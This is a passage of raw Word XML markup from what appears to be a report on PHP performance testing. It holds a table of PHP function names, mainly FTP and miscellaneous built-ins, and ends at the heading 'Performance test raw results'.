                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_mdtm()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66668458" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_mkdir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F01304" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_mlsd()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66163B45" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_nb_continue()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DECB675" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_nb_fget()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D209206" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_nb_fput()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658EE331" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_nb_get()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AEC81C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_nb_put()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3FB6F0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_nlist()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6059C3B7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_pasv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB63BF6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ftp_put()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60274F91" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_pwd()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F24499C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_quit()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E28E102" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_raw()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514CBC74" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_rawlist()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E686DC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_rename()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31D05BCC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_rmdir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215E6B97" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_set_option()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E524876" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_site()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75B2B114" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_size()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="634040C7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_ssl_connect()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3301FD84" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_systype()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E678804" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mysqli_connect()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14DA0435" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>connection_aborted()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE01762" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>connection_status()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EDD1EF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>connection_timeout()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9B94AB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>constant()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA32B9B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>define()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CC97BA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>defined()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E579D0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>die()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057EDFBB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>eval()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F59C121" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6152F1AB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>get_browser()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460E0F80" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>__halt_compiler()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24758E4C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>highlight_file()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE0C98F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>highlight_string()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A14585" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hrtime()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F4DF99" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ignore_user_abort()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7432DA14" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pack()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE527E0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>php_strip_whitespace()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B37AAE5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>show_source()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A3E9F5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sleep()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685342E1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sys_getloadavg()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D399AA3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>time_nanosleep()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EE4472" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>time_sleep_until()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C48C1A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>uniqid()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3F8E40" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>unpack()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D6B2C1" w14:textId="3440E7B2" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>usleep()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6397254F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E37BCB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRDefault="001C3F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E70060" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:sectPr w:rsidR="001C3F72">
          <w:footerReference w:type="default" r:id="rId35"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFCD143" w14:textId="080A2981" w:rsidR="00564269" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Performance test raw results</w:t>
      </w:r>
    </w:p>
